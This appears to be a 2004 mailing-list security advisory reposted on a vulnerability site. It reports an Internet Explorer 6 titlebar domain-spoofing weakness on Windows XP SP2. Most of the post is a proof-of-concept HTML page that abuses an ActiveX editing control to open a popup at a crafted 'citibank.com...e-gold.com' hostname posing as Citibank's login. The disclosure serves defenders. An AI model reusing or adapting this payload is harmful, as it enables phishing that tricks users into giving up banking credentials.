Windows XP SP2 has a vulnerability in Internet Explorer allowing malicious domain exploitation.
`Hi LIST.
Windows XP SP2 forces the titlebar to be present in script-initiated
Internet Explorer windows.
In the titlebar, domain name is listed before the page title.
Using magic DNS,this domain name can be exploited by malicious people to
trick users into visiting a malicious popup window.
The weakness has been confirmed in version 6.0 on a fully patched system
running Windows XP with SP2 installed.
Example:
- -----8<----- -----8<----- -----8<----- -----8<-----
[!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
[!-- saved from url=(0014)about:internet -->
[html lang="x-klingon">
[head>
[title>Welcome to Citibank[/title>
[meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
[meta http-equiv="Content-Script-Type" content="text/javascript">
[script type="text/javascript">
[!-- Begin
function shellscript()
{
window.focus();
pURL = 'http://securelogin.citibank.com"+".e-gold.com/';
sP = 'toolbar=0,scrollbars=0,location=0,statusbar=0,';
sP += 'menubar=0,resizable=0,width=315,';
sP += 'height=200,left = 250,top = 200'
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(pURL, '" + id + "',sP);");
}
function main()
{
targetURL = 'http://citibank.com/us/index.htm';
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
location.replace(targetURL);
}
setTimeout(' main() ',1000);
// End -->
[/script>
[/head>
[object
id="x"
classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"
width="1"
height="1"
align="middle"
>
[param name="ActivateApplets" value="1">
[param name="ActivateActiveXControls" value="1">
[/object>
[/body>
[/html>
- -----8<----- -----8<----- -----8<----- -----8<-----
Reference:
http-equiv (HOW TO BREAK XP SP2 POPUP BLOCKER)
http://www.securityfocus.com/archive/1/384037
REGARDS.
--
bitlance winter
_________________________________________________________________
On the road to retirement? Check out MSN Life Events for advice on how to
get there! http://lifeevents.msn.com/category.aspx?cid=Retirement
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo